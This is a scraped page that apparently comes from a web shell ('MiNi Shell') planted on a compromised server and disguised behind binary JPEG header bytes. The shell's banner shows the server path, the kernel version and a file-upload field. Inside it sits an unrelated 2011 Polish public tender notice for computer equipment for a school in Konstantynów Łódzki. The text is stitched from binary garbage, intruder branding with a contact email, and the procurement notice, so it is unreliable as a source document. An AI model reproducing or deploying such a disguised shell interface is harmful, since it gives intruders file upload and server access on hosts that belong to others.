JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110419/83130-N-2011.html

<p class="kh_header"><b>Konstantynów Łódzki: Dostawa sprzętu komputerowego w Projekcie pn. Program rozwojowy Powiatowego Zespołu Edukacyjnego w Konstantynowie Łódzkim</b><br>
<b>Numer ogłoszenia: 83130 - 2011; data zamieszczenia: 19.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zespół Edukacyjny , ul. Kilińskiego 75, 95-050 Konstantynów Łódzki, woj. łódzkie, tel. 42 211 29 97, faks 42 211 29 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzekonst.pl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Publiczna szkoła ponadgimnazjalna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego w Projekcie pn. Program rozwojowy Powiatowego Zespołu Edukacyjnego w Konstantynowie Łódzkim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa fabrycznie nowego sprzętu komputerowego z oprogramowaniem, niezbędnego do realizacji Projektu pn. Program rozwojowy Powiatowego Zespołu Edukacyjnego w Konstantynowie Łódzkim współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. 
2. Poniżej zostały określone minimalne parametry urządzeń, co oznacza, że można zaoferować urządzenia o wyższych parametrach jakościowo-wydajnościowych od żądanych przez Zamawiającego pod warunkiem spełnienia wszystkich określonych parametrów minimalnych. 
3. Za oprogramowanie równoważne opisanemu w specyfikacji przy pomocy nazwy oraz źródła pochodzenia uznaje się oprogramowanie posiadające następujące cechy:
- zakres funkcjonalny oprogramowania jest w pełni zgodny z zakresem funkcjonalnym oprogramowania wskazanego;
- funkcje dostępne są pod taką samą nazwą jak dla oprogramowania wskazanego w zbliżonym układzie  menu;
- formaty danych  wejściowych  i wyjściowych  są identyczne i odpowiadają przynajmniej liczbie i typowi formatów dla programów  wskazanych;
- warunki licencji oprogramowania nie mniej korzystne niż licencje programów wskazanych;
- oprogramowanie dostarczone na nośnikach CD lub DVD;
- dokumentacja przynajmniej w formie elektronicznej na dostarczonych nośnikach. 
_________________________________________________________________
Część 1
Zestaw komputerowy z systemem operacyjnym - 14 zestawów
1. Procesor: min. czterordzeniowy, 3 GHZ, cache L3 6MB, obsługa pamięci 1333 MHz
2. Pamięć: min. 8 GB RAM, 1333 MHz
3. HDD: min. 640GB, 7200rpm, SATA 600
4. Napęd optyczny: DVD-RW z oprogramowaniem do nagrywania płyt
5. Porty USB: min. 4 x USB 2.0
6. Komunikacja: LAN 100/1000BaseT Gigabitethernet (RJ45)
7. Karta dźwiękowa: zintegrowana
8. Obudowa: pełnoznakowa klawiatura USB, mysz optyczna USB ze scrollem
9. Oprogramowanie narzędziowe: sterowniki (nośnik CD/DVD)
10. Listwa zasilająco-filtrująca: min. 5 gniazd, wyłącznik, dwa bezpieczniki, 3-żyłowy przewód zasilający 3m
11. Karta graficzna i monitor (wymagania minimalne):
- rodzaj pamięci: DDR III
- zainstalowana pamięć wideo: 512 MB
- szyna pamięci: 256 bitów
- taktowanie rdzenia:  600MHz
- taktowanie pamięci:  900 MHz
- typ złącza magistrali: PCI-E 16x
- złącze zewnętrzne: 2x DVI-I
- obsługiwane standardy:  OpenGL 2.0, DirectX 10.1
- monitor: 22, rozdzielczość 1680x1050, złącze DVI, D-sub, wbudowane głośniki, norma TCO03
12. Oprogramowanie:
- oprogramowanie systemowe: MS Windows 7 Professional PL 64-bit OEM lub równoważny (licencja + nośnik)
- oprogramowanie biurowe: MS Office 2010 PL EDU lub równoważne (licencja + nośnik)
- oprogramowanie do nagrywania płyt CD/DVD/DVD-RW
- sterowniki
13. Zestawy komputerowe muszą mieć zainstalowany i skonfigurowany (zainstalowane sterowniki) system operacyjny Windows 7 64-bit Professional wraz z oprogramowaniem biurowym (zestaw gotowy do pracy)
14. Gwarancja: pisemna gwarancja na okres min. 36-miesięcy
_____________________________________________________________
Część 2
Oprogramowanie komputera i laptopa - 18 szt.
1. Licencja Microsoft Office std 2010 Molp Edu lub równoważne (do całości zamówienia ma być dołączony jeden nośnik umożliwiający instalację w wersji x86 i  wersji x64. Wersje mogą znajdować się na tym samym lub na oddzielnych nośnikach) (licencja + nośnik)
2. Licencja Microsoft Windows Server 2008R2 CAL Molp Edu lub równoważna
3. Licencja ESET Smart Security Business Edition Suite na 1 rok lub równoważna
_____________________________________________________________
Cześć 3
Laptop - 4 szt.
1. Procesor: min. dwurdzeniowy 2,5 MHz (z obsługą  wirtualizacji rdzeni)
2. Matryca: min. 15 1366x768
3. Dysk twardy: min. 320GB
4. Pamięć: min.DDR3 2 GB 1066 MHZ (w jednej kości) z możliwością rozbudowy do 8GB
5. Sieć IEEE 802.11b/g/n oraz LAN 10/100/1000 RJ-45
6. Czytnik kart pamięci SDHC
7. System Operacyjny OEM Windows 7 Professional lub równoważny (dołączony nośnik z systemem)
8. Gwarancja: pisemna gwarancja na okres min. 2 lat
___________________________________________________________
Część 4
Kserokopiarka - 1 szt.
1. Prędkość kopiowania 25 stron A4/min, 12,5 strony A3/min
2. Technologia laserowa druku, toner jednoskładnikowy
3. Rozmiar kopii A3-A6
4. Pamięć zainstalowana 512 MB, możliwość rozbudowy do 1024 MB
5. Zainstalowany dysk twardy 80GB
6. Zainstalowany Duplaks dukarki
7. Zainstalowany kolorowy skaner.
8. Wbudowana funkcja drukarki sieciowej z obsługą języka PCL 6 i PostScript Level 3
9. Interface Ethernet RJ-45 10/100BaseTX
10. Kasety na papier 2x500 arkuszy, ręczny na 200 arkuszy
11. Zoom 25-400% co 1 %
12. Możliwość instalacji podajnika oryginałów ADF
13. Sortowanie elektroniczne
14. Możliwość uruchomienia kodów dostępu dla użytkowników
15. Zarządzanie urządzeniem przez sieć komputerową
16. Panel obsługi w języku polskim
17. Stolik na urządzenie
18. Wydajność bębna 300.000 stron
19. Wydajność tonera 20.000 stron
20. Gwarancja 2 lata lub 300.000 stron
__________________________________________________________
Część 5
Projektor multimedialny - 2 szt.
1. Rozdzielczość 1024x768 (XGA)
2. Jasność 4000 ANSI Lum. (3200 w trybie cichym)
3. Kontrast 2500:1
4. Poziom hałasu 34 dB w trybie normalnym i 29 dB w trybie cichym
5. Korekcja Keystone +/- 40 stopni
6. Żywotność lampy 2000 godz w trybie normalnym i 3000 godz w trybie cichym
7. Wbudowane głośniki
8. Pilot
9. Dołączony obiektyw
10. Zoom optyczny oraz cyfrowy
11. Złącza:
- 2x D-sub 15-pin
- 1xRCA (video)
- 1xS-Video
- 1xHDMI
- 1xRJ-45
- 2xRCA (audio)
- 1xRS232
12. Gwarancja producenta 2 lata
____________________________________________________________
Część 6
Tablica interaktywna - 1 szt.
1. Powierzchnia robocza - min. 1456x1091
2. Technologia - elektromagnetyczna pasywna
3. Obsługa - pisakiem lub wskaźnikiem elektronicznym
4. Zasilanie - port USB komputera
5. Możliwość podłączenia do komputera - za pomocą portu USB lub portu RS 232, możliwość przedłużenia kabla łączącego komputer z tablicą do 30 m bez konieczności stosowania aktywnych przedłużaczy
6. Zgodność z systemami operacyjnymi - Windows XP, Vista, 7 (32 i 64 Bit), Linux i Mac Os - wymagane polskie wersje językowe i pliki pomocy dla każdego z wymienionych systemów w języku polskim
7. Dodatkowe wymagania - możliwość jednoczesnego pisania dwoma pisakami w dowolnym miejscu tablicy
8. Pasek skrótów - tylko po jednej stronie tablicy: przycisk kalibracji bez konieczności podchodzenia do komputera na bocznym pasku skrótów
9. Waga tablicy - max 17 kg
10. Akcesoria dołączone (wymagane) - 2 pisaki elektroniczne zasilane bateriami, 2 pisaki elektroniczne nie wymagające wymiany baterii (zasilane kondensatorem) + ładowarka zasilana z portu USB umożliwiająca ustawienie na stole lub montaż na ścianie. Pełne ładowanie w ciągu 20 sekund (Zamawiający nie dopuszcza pisaków zasilanych akumulatorem), elektroniczny wskaźnik teleskopowy o długości min. 53 cm umożliwiający obsługę tablicy bez zasłaniania, oprogramowanie w języku polskim, multimedialna instrukcja obsługi oprogramowania w postaci filmu krok po kroku z komentarzem lektora
11. Gwarancja - tablica: 5 lat, pisaki i wskaźnik do tablicy: 3 lata
_____________________________________________________________
4. Miejsce dostawy: Powiatowy Zespół Edukacyjny w Konstantynowie Łódzkim, ul. Kilińskiego 75, 95-050 Konstantynów Łódzki.
5. Wykonawca zobowiązany jest do zapewnienia warunków gwarancji i serwisu oferowanego sprzętu. Serwis gwarancyjny odbywał się będzie w miejscu wskazanym w pkt 4. W przypadku konieczności naprawy sprzętu w innym miejscu, wysyłka sprzętu będzie dokonana na koszt i ryzyko Wykonawcy.
6. Odbiór przedmiotu zamówienia dokonany zostanie na podstawie protokołów zdawczo-odbiorczych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.13.00-6, 30.21.30.00-5, 38.65.21.00-1, 48.90.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Zamawiający wymaga dołączenia do oferty oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego na formularzu stanowiącym Załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku posiadania wiedzy i doświadczenia Zamawiający wymaga dołączenia do oferty oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego na formularzu stanowiącym Załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku dysponowania odpowiednim potencjałem technicznym Zamawiający wymaga dołączenia do oferty oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego na formularzu stanowiącym Załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia Zamawiający wymaga dołączenia do oferty oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego na formularzu stanowiącym Załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Zamawiający wymaga dołączenia do oferty oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego na formularzu stanowiącym Załącznik nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmian w umowie na warunkach określonych w pkt 3. Wystąpienie którejkolwiek z okoliczności wskazanych w niniejszym paragrafie nie stanowi zobowiązania Stron do wprowadzenia zmiany.
2. Zmiany umowy mogą być dokonane na piśmie za zgodą Stron pod rygorem nieważności.
3. Dopuszcza się możliwość zmiany postanowień zawartej umowy w następującym zakresie:
a) terminu realizacji umowy - gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy zgodnie ze SIWZ;
b) zmiana stawki VAT.
4. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych w szczególności:
a) zmiany danych podmiotowych Wykonawcy;
b) udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzekonst.pl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zespół Edukacyjny w Konstantynowie Łódzkim, ul. Kilińskiego 75, 95-050 Konstantynów Łódzki, Sekretariat..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2011 godzina 16:00, miejsce: Powiatowy Zespół Edukacyjny w Konstantynowie Łódzkim, ul. Kilińskiego 75, 95-050 Konstantynów Łódzki, Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Program rozwojowy Powiatowego Zespołu Edukacyjnego w Konstantynowie Łódzkim współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com